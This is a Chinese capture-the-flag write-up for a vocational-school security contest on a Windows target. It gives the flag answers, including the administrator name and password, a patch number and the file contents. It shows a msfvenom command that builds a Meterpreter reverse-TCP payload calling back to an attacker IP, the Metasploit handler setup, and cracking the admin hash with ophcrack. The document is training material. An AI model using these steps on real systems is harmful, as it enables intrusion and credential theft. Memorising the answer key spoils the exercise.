中职组安全-win20230217-环境-解析

*任务说明:

仅能获取win20230217的IP地址

用户名:test,密码:123456

  1. 访问服务器主机,找到主机中管理员名称,将管理员名称作为Flag值提交;

john

  1. 访问服务器主机,找到主机中补丁信息,将补丁编号作为Flag值提交;

KB4500331

查看方法如下:打开"开始"菜单。

单击"控制面板"

打开"添加删除程序"。

在弹出来的窗口左上角有"查看已安装的更新"选项。

3·访问服务器主机,找到主机中管理员密码,将管理员密码作为Flag值提交;

Goodluck

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.100.100.119 LPORT=4444 -b"\x00" -f exe > aiyou.exe将驱动开启就可以传文件到靶机运行

1、启动Metasploit,use exploit/multi/handler

2、设置payload,set payload windows/meterpreter/reverse_tcp

3、设置监听,set lhost ip

4、设置监听端口,set lport 4444

将John的hash弄到ophcrack密码出来了

4·访问服务器主机,找到主机中管理员桌面下文本文档信息,将文本文档名称作为Flag值提交;

ruK97azZp4

5·访问服务器主机,找到主机中管理员桌面下文本文档信息,将文本文档中信息作为Flag值提交;

rdO35NBXXi

6·访问服务器主机,找到主机中回收站唯一信息,将信息中的内容作为Flag值提交。

VX1DUEv95s

修改administrator的密码,登录进去回收站查看

相关推荐
北京耐用通信5 小时前
电磁阀通讯频频“掉链”?耐达讯自动化Ethernet/IP转DeviceNet救场全行业!
人工智能·物联网·网络协议·安全·自动化·信息与通信
银空飞羽8 小时前
让Trae SOLO全自主学习开发近期爆出的React RCE漏洞靶场并自主利用验证(CVE-2025-55182)
前端·人工智能·安全
YJlio9 小时前
SDelete 学习笔记(9.18):安全删除、空闲清理与介质回收实战
笔记·学习·安全
CNRio10 小时前
第8章 网络安全应急响应
网络·安全·web安全
漏洞文库-Web安全11 小时前
Linux逆向学习记录
linux·运维·学习·安全·web安全·网络安全·逆向
wanhengidc12 小时前
云手机 数字生活中新的可能
运维·服务器·科技·安全·智能手机·生活
浩浩测试一下13 小时前
C&&汇编中的调用约定
大数据·汇编·安全·web安全·网络安全·系统安全
黑客思维者15 小时前
IEEE 1547.3-2023与IEC62443标准异同分析
安全·系统安全·devsecops
渲吧-云渲染15 小时前
PDM部署革新:SaaS化转型与安全新挑战
安全·pdm
吳所畏惧16 小时前
少走弯路:uniapp里将h5链接打包为apk,并设置顶/底部安全区域自动填充显示,阻止webview默认全屏化
android·安全·uni-app·json·html5·webview·js